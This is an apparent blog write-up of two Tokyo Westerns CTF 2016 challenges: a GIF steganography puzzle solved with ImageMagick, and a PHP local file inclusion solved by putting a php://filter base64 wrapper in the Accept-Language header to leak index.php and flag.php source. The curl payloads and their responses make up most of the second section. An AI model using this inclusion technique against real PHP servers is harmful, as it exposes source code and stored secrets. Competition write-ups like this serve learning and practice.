TWCTF{Write_up} -Tokyo Westerns/MMA CTF 2nd 2016

2:45:00 PM Unknown 0 Comments




Glance- 50 pt
We are given a Gif file and said that the flag is inside .(You found the challenging task here ) .Trying to investigate through the Stegosolve tool .
We have 201 frame let's extract them .

convert glance.gif flag.png

The picture is spliced into pieces ,every piece has a part of the flag.Let's merge the pieces to get the flag.


montage flag-*.png \-title x1 -shadow -geometry +1+1 \myflag.png






Global page- 50 pt
 At the first sight ,it looks like LFI vulnerability 
curl http://globalpage.chal.ctf.westerns.tokyo/?page=index.php
<!doctype html>
<html>
<head>    

<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<br />
<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>:  include(indexphp/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'indexphp/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
using php wrappers :D (php filtre is my besty)
curl -H "accept-language:/filter/convert.base64-encode/resource=index" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
Resposne from the server
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p>
</body>
</html>
Decode the script
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
    <li><a href="/?page=tokyo">Tokyo</a></li>
    <li><del>Westerns</del></li>
    <li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
        include "$dir/$l.php";
?>
</p>
<?php
    }
}
?>
</body>
</html>
<?php
}
?>
curl -H "accept-language:/filter/convert.base64-encode/resource=flag" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
we received the flag content
<html>
<head>

<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==<br />

</body>
</html>
Now ,Decode with base64
echo "PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==" | base64 -d


0 comments: